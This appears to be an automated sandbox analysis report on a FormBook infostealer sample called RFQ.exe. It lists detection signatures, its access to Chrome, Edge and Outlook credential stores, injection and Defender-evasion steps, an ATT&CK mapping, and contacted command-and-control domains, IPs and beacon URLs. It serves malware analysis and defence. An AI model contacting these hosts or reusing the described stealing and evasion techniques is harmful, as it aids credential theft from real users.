            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\icacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Services File Permissions Weakness            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Services File Permissions Weakness            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Services File Permissions Weakness            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Software Packing            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426618 Sample: RFQ.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 34 www.fusionndustries.xyz 2->34 36 www.book-of-degen.xyz 2->36 38 16 other IPs or domains 2->38 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 Yara detected FormBook 2->52 56 6 other signatures 2->56 10 RFQ.exe 4 2->10         started        signatures3 54 Performs DNS queries to domains with low reputation 36->54 process4 signatures5 66 Adds a directory exclusion to Windows Defender 10->66 68 Injects a PE file into a foreign processes 10->68 13 RFQ.exe 10->13         started        16 powershell.exe 23 10->16         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 18 KdNqCjDpwdLOuI.exe 13->18 injected 72 Loading BitLocker PowerShell Module 16->72 21 WmiPrvSE.exe 16->21         started        23 conhost.exe 16->23         started        process8 signatures9 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 25 icacls.exe 13 18->25         started        process10 signatures11 58 Tries to steal Mail credentials (via file / registry access) 25->58 60 Tries to harvest and steal browser information (history, passwords, etc) 25->60 62 Modifies the context of a thread in another process (thread injection) 25->62 64 2 other signatures 25->64 28 KdNqCjDpwdLOuI.exe 25->28 injected 32 firefox.exe 25->32         started        process12 dnsIp13 40 www.fusionndustries.xyz 203.161.50.128, 49744, 49745, 49746 VNPT-AS-VNVNPTCorpVN Malaysia 28->40 42 www.book-of-degen.xyz 75.2.60.5, 49740, 49741, 49742 AMAZON-02US United States 28->42 44 8 other IPs or domains 28->44 74 Found direct / indirect Syscall (likely to bypass EDR) 28->74 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ.exe29%VirustotalBrowse
            RFQ.exe18%ReversingLabs
            RFQ.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.seatheskydesign.online1%VirustotalBrowse
            wedgetechflash.co.ke0%VirustotalBrowse
            www.blueberry-breeze.com1%VirustotalBrowse
            www.vvbgsekbo.store1%VirustotalBrowse
            www.elysiangame.online2%VirustotalBrowse
            www.collegeclubapparel.com1%VirustotalBrowse
            www.book-of-degen.xyz4%VirustotalBrowse
            www.othlastore.com0%VirustotalBrowse
            www.drjoserizal.com0%VirustotalBrowse
            www.mytemplotech.com1%VirustotalBrowse
            www.66bm99.shop2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://htmlcodex.com0%VirustotalBrowse
            http://www.blueberry-breeze.com/bnz5/0%VirustotalBrowse
            https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/1250%VirustotalBrowse
            http://www.fusionndustries.xyz/bnz5/1%VirustotalBrowse
            http://www.wedgetechflash.co.ke/bnz5/0%VirustotalBrowse
            http://www.othlastore.com/bnz5/0%VirustotalBrowse
            http://www.searchvity.com/4%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.seatheskydesign.online
            		66.96.162.136
            		truefalseunknown
            wedgetechflash.co.ke
            		37.61.232.138
            		truefalseunknown
            www.myspinpods.com
            		91.195.240.117
            		truefalse
              		unknown
              ccxx.cat-dragon-diiojsofso.com
              		134.122.178.172
              		truefalse
                		unknown
                www.blueberry-breeze.com
                		91.195.240.117
                		truefalseunknown
                www.vvbgsekbo.store
                		43.132.191.179
                		truefalseunknown
                www.fusionndustries.xyz
                		203.161.50.128
                		truetrue
                  		unknown
                  www.elysiangame.online
                  		174.138.177.173
                  		truefalseunknown
                  www.ojyphyi.website
                  		103.66.94.182
                  		truefalse
                    		unknown
                    www.collegeclubapparel.com
                    		91.195.240.117
                    		truefalseunknown
                    www.book-of-degen.xyz
                    		75.2.60.5
                    		truetrueunknown
                    www.othlastore.com
                    		91.195.240.117
                    		truefalseunknown
                    www.mytemplotech.com
                    		91.195.240.117
                    		truefalseunknown
                    www.naglissere.ru
                    		185.215.4.13
                    		truefalse
                      		unknown
                      www.aretikokkoris.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.drjoserizal.com
                        		unknown
                        		unknowntrueunknown
                        www.wedgetechflash.co.ke
                        		unknown
                        		unknowntrue
                          		unknown
                          www.66bm99.shop
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.seatheskydesign.online/bnz5/false
                            		unknown
                            http://www.wedgetechflash.co.ke/bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXDfalse
                              		unknown
                              http://www.mytemplotech.com/bnz5/?kFGTX=Q6OxIXo8tXD&gr=23UPPxRjGSNUJTgmtj2qEyLz/ntkvqKRRFHtLj5W9bo9CLdZgto2DYnNUhYakwcl0jYhNZjG9CPBZRuAkcQvlwifYrEIa7IdBg/GlOURZYl7vwvnI0pSC8vNdE3Ml+j1JA==false
                                		unknown
                                http://www.fusionndustries.xyz/bnz5/?gr=xJEpvmsSZWMn08k0fswZUF3i8FJV6XmZDE9zwebvcwnWaSyOd7ieKTZxqd8LfY736VbykJAs8QtIZUIve9rpP7hx1kot6ym/I/JMbr2a3NM5FLBwcSvbdBi7Xsx3rbBzJg==&kFGTX=Q6OxIXo8tXDfalse
                                  		unknown
                                  http://www.myspinpods.com/bnz5/false
                                    		unknown
                                    http://www.blueberry-breeze.com/bnz5/falseunknown
                                    http://www.elysiangame.online/bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ==false
                                      		unknown
                                      http://www.naglissere.ru/bnz5/?kFGTX=Q6OxIXo8tXD&gr=UMNiUc6XIv/d2uC7IlFmdfXYbiB/0cGyF5nVzLNzjfRVEsK0zJlkeP+z5Z1MT37PYueGSacB+keqYnFu3S8ymlT8yqaJ/dNBtni0ghgK1oHFbUR/jwcWs7rz0kpYku2gKQ==false
                                        		unknown
                                        http://www.fusionndustries.xyz/bnz5/falseunknown
                                        http://www.blueberry-breeze.com/bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXDfalse
                                          		unknown
                                          http://www.collegeclubapparel.com/bnz5/?kFGTX=Q6OxIXo8tXD&gr=k/xiXeKkElN9lmj7tVr8idaf/wpGLS/XfVixYgRWGr55oYC/zYvRgJVTIR6Icyf7C+fnrNLi6yuD3OJtT3FnzryZpasAqgaz10+v5QpHvKqHjO9njldZ1cZrBWCORkcOsw==false
                                            		unknown
                                            http://www.seatheskydesign.online/bnz5/?gr=6OoDw3xNyuUxCb7SO8/wQWyB7gJcoYv4ZTaI1h51IYF+sVRVSOMOuR9r6Rx19mFv7TRZYpTQN5hhg3dhUB7GRpmcej2viG1w8/6TMbbBsdyRJnmf1CwT9GI+x7zG1LG56Q==&kFGTX=Q6OxIXo8tXDfalse
                                              		unknown
                                              http://www.wedgetechflash.co.ke/bnz5/falseunknown
                                              http://www.ojyphyi.website/bnz5/false
                                                		unknown
                                                http://www.vvbgsekbo.store/bnz5/?gr=J5sdn6UHwrTFsLl7PSE+273sNdFQMS+e/Eepb66AdUMKjr/OxnnLPWtAHrBNDsqMNKwlUYW9tPjJnamC/Yv4erSiZvDT3TM3BG/s9HlMNwb39HB/smoNNYSAbH35aGk1gA==&kFGTX=Q6OxIXo8tXDfalse
                                                  		unknown
                                                  http://www.othlastore.com/bnz5/falseunknown
                                                  http://www.ojyphyi.website/bnz5/?kFGTX=Q6OxIXo8tXD&gr=N6yreUGrEwmnZyuRuhm7fu2pjjSQdKU6BgmK3dVc5hhl4QdzezeViDhR5sAjVdDUmsLMRcLdrvPdYjLD7b1ZIx3A1Z1l9931wLtzigwrLlFKueBnJaM0qh412Fe43461Qw==false
                                                    		unknown
                                                    http://www.book-of-degen.xyz/bnz5/?kFGTX=Q6OxIXo8tXD&gr=90cL6Q+hnzVn1nW1iqhU1H7cWV3fvz6SaIERCijRkAMfp+TQya0GlzYPpQzULEJqUDrLh9Kv8LQV8OdLSWJ6ERPfs+zhKb8B6PZEz280PNZ5UlofhaQwyuwHrpNW2TXV5g==false
                                                      		unknown
                                                      http://www.naglissere.ru/bnz5/false
                                                        		unknown
                                                        http://www.book-of-degen.xyz/bnz5/false
                                                          		unknown
                                                          http://www.vvbgsekbo.store/bnz5/false
                                                            		unknown
                                                            http://www.66bm99.shop/bnz5/false
                                                              		unknown
                                                              http://www.collegeclubapparel.com/bnz5/false
                                                                		unknown
                                                                http://www.othlastore.com/bnz5/?gr=zdwoT+oWWlgyDxCB5HfbKl0ceeCoMM1WsfXRj0lrAfPT+1DsmzcZqVZ0gwFwp9Re8dyKn5b7kYDBw8FcuEN9m4nkKjfCAjjkfqKhmamnNO4NqnkVPKDFVPgTCNPXruJSGA==&kFGTX=Q6OxIXo8tXDfalse
                                                                  		unknown
                                                                  http://www.mytemplotech.com/bnz5/false
                                                                    		unknown

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://htmlcodex.comicacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                    https://duckduckgo.com/chrome_newtabicacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://duckduckgo.com/ac/?q=icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cdn.jsdelivr.net/npm/bootstrapicacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.cssicacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://code.jquery.com/jquery-3.4.1.min.jsicacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.ecosia.org/newtab/icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.jsdelivr.net/npm/bootstrap-iconsicacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125icacls.exe, 00000008.00000002.4432678458.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003930000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                                      https://ac.ecosia.org/autocomplete?q=icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://wedgetechflash.co.ke/bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/icacls.exe, 00000008.00000002.4432678458.00000000050E6000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.naglissere.ruKdNqCjDpwdLOuI.exe, 0000000A.00000002.4433484681.00000000050AF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.searchvity.com/icacls.exe, 00000008.00000002.4432678458.000000000572E000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.000000000442E000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchicacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.searchvity.com/?dn=icacls.exe, 00000008.00000002.4432678458.000000000572E000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.000000000442E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ.exe, 00000000.00000002.2009924751.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://htmlcodex.com/credit-removalicacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      91.195.240.117
                                                                                                      		www.myspinpods.comGermany
                                                                                                      		47846SEDO-ASDEfalse
                                                                                                      203.161.50.128
                                                                                                      		www.fusionndustries.xyzMalaysia
                                                                                                      		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                      66.96.162.136
                                                                                                      		www.seatheskydesign.onlineUnited States
                                                                                                      		29873BIZLAND-SDUSfalse
                                                                                                      185.215.4.13
                                                                                                      		www.naglissere.ruDenmark
                                                                                                      		50129TVHORADADAESfalse
                                                                                                      174.138.177.173
                                                                                                      		www.elysiangame.onlineUnited States
                                                                                                      		19318IS-AS-1USfalse
                                                                                                      103.66.94.182
                                                                                                      		www.ojyphyi.websiteChina
                                                                                                      		55933CLOUDIE-AS-APCloudieLimitedHKfalse
                                                                                                      134.122.178.172
                                                                                                      		ccxx.cat-dragon-diiojsofso.comUnited States
                                                                                                      		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                                                      75.2.60.5
                                                                                                      		www.book-of-degen.xyzUnited States
                                                                                                      		16509AMAZON-02UStrue
                                                                                                      43.132.191.179
                                                                                                      		www.vvbgsekbo.storeJapan4249LILLY-ASUSfalse
                                                                                                      37.61.232.138
                                                                                                      		wedgetechflash.co.keUnited Kingdom
                                                                                                      		22612NAMECHEAP-NETUSfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                      Analysis ID:1426618
                                                                                                      Start date and time:2024-04-16 11:58:06 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 12m 25s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:11
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:2
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:RFQ.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@11/7@24/10
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 75%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 89%
                                                                                                      • Number of executed functions: 129
                                                                                                      • Number of non-executed functions: 293
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      11:58:53API Interceptor1x Sleep call for process: RFQ.exe modified
                                                                                                      11:58:55API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                                      11:59:47API Interceptor15434762x Sleep call for process: icacls.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      91.195.240.117HSBC Advice_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • www.heavydripluxury.com/avr4/
